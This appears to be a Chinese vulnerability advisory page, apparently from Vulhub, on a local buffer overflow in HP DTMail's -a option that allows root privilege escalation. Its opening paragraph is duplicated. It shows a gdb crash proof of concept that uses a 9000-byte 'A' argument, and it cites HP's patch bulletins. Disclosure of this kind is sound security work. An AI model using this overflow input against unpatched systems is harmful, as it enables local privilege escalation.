VULHUB ™

HP DTMail是在桌面上使用的邮件客户端。 DTMail在处理-a选项参数时存在缓冲区溢出漏洞，本地攻击者可以利用此漏洞获得root用户权限。 以下gdb输出显示了这个漏洞： gdb) r -a -a `perl -e 'print "A" x 9000'` Starting program: /cluster/members/member0/tmp/dtmail -a `perl -e 'print "A"x 9000'` (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. warning: Hit heuristic-fence-post without finding warning: enclosing function for address 0x4141414141414140 HP dtmail 5.1b...

HP DTMail是在桌面上使用的邮件客户端。 DTMail在处理-a选项参数时存在缓冲区溢出漏洞，本地攻击者可以利用此漏洞获得root用户权限。 以下gdb输出显示了这个漏洞： gdb) r -a -a `perl -e 'print "A" x 9000'` Starting program: /cluster/members/member0/tmp/dtmail -a `perl -e 'print "A"x 9000'` (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. warning: Hit heuristic-fence-post without finding warning: enclosing function for address 0x4141414141414140 HP dtmail 5.1b HP已经为此发布了安全公告（HPSBUX02162/HPSBTU02163）以及相应补丁: HPSBUX02162：SSRT061223 rev.1 - HP-UX Running dtmail, Local Execution of Arbitrary Code 链接：http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00793091 HPSBTU02163：SSRT061223 rev.1 - HP Tru64 UNIX Running dtmail, Local Execution of Arbitrary Code 链接：http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00793805